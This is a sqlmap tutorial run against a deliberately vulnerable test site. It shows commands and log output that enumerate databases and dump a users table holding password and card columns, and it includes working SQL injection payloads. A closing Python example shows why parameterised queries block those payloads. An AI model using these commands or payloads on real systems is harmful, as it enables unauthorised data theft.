SQLMAP is a vulnerability scanning tool that targets databases (SQL injection).
(Test carefully: only against targets you are authorised to scan.)
Download
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
Start scanning (--dbs: enumerate DBMS databases); a deliberately vulnerable test site is used below.
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
[*] starting @ 18:25:09 /2019-08-14/

[18:25:10] [INFO] resuming back-end DBMS 'mysql'
[18:25:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7330=7330

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 4177 FROM (SELECT(SLEEP(5)))vSob)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7674 UNION ALL SELECT NULL,NULL,CONCAT(0x7171707871,0x7356667458666966494f6f7a7a4c77684a6876584761437444714c41784f4574455a6f6e6165724a,0x71716a7071)-- ggYH
---
[18:25:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.10, Nginx 1.4.1
back-end DBMS: MySQL >= 5.0.12
[18:25:10] [INFO] fetching database names
[18:25:10] [INFO] used SQL query returns 2 entries
[18:25:10] [INFO] resumed: 'information_schema'
[18:25:10] [INFO] resumed: 'acuart'
available databases [2]:
[*] acuart
[*] information_schema

[18:25:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] ending @ 18:25:10 /2019-08-14/
This turns up usable information: the application's database is named acuart.
[18:25:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.10, Nginx 1.4.1
back-end DBMS: MySQL >= 5.0.12
[18:25:10] [INFO] fetching database names
[18:25:10] [INFO] used SQL query returns 2 entries
[18:25:10] [INFO] resumed: 'information_schema'
[18:25:10] [INFO] resumed: 'acuart'
available databases [2]:
[*] acuart
[*] information_schema
Next, target the database that was found.
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
This lists the tables it contains.
[18:27:21] [INFO] fetching tables for database: 'acuart'
[18:27:21] [INFO] used SQL query returns 8 entries
[18:27:22] [INFO] retrieved: 'artists'
[18:27:22] [INFO] retrieved: 'carts'
[18:27:22] [INFO] retrieved: 'categ'
[18:27:23] [INFO] retrieved: 'featured'
[18:27:23] [INFO] retrieved: 'guestbook'
[18:27:24] [INFO] retrieved: 'pictures'
[18:27:24] [INFO] retrieved: 'products'
[18:27:24] [INFO] retrieved: 'users'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Scan the users table further.
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns
Every column is revealed.
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
Then dump the account contents that are likely stored there.
python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump
POST data can also be supplied.
python sqlmap.py -u https://www.domain.TLD/user/login --data 'username=123&password=321'
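As an added illustration (not part of the original post and not sqlmap's code), here is why the boolean-based and UNION payloads from the log above work against a query built by string concatenation and fail against a parameterised one, using an in-memory SQLite stand-in for the artists table. The table layout and rows are constructed assumptions, and the time-based SLEEP payload is left out because SQLite has no SLEEP().

```python
import sqlite3

def make_db():
    # Constructed stand-in for the acuart artists table; three columns are
    # assumed only so the 3-column UNION payload from the log lines up.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT)")
    con.executemany("INSERT INTO artists VALUES (?, ?, ?)",
                    [(1, "constructed artist 1", "sample"),
                     (2, "constructed artist 2", "sample")])
    return con

def lookup_concat(con, artist):
    # Vulnerable pattern: the request parameter is pasted into the SQL text,
    # so whatever follows the number becomes part of the WHERE clause.
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id = " + artist
    return con.execute(sql).fetchall()

def lookup_param(con, artist):
    # Hardened pattern: the value is bound as data; the SQL text never changes.
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id = ?"
    return con.execute(sql, (artist,)).fetchall()

def demo():
    con = make_db()
    r = {}
    # Boolean-based blind oracle: a true and a false condition give different pages.
    r["bool_true"] = lookup_concat(con, "1 AND 7330=7330")    # 1 row
    r["bool_false"] = lookup_concat(con, "1 AND 7330=7331")   # 0 rows
    # UNION with NULL padding smuggles an attacker-chosen marker into column 3
    # (the MySQL CONCAT(0x..) marker is replaced by a plain literal for SQLite).
    union = "-7674 UNION ALL SELECT NULL,NULL,'qqpxq'"
    r["union"] = lookup_concat(con, union)                    # [(None, None, 'qqpxq')]
    # Same inputs through the bound-parameter query: treated as a literal value,
    # matching nothing, while a genuine id still works.
    r["param_bool"] = lookup_param(con, "1 AND 7330=7330")    # []
    r["param_union"] = lookup_param(con, union)               # []
    r["param_legit"] = lookup_param(con, "1")                 # 1 row
    return r

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```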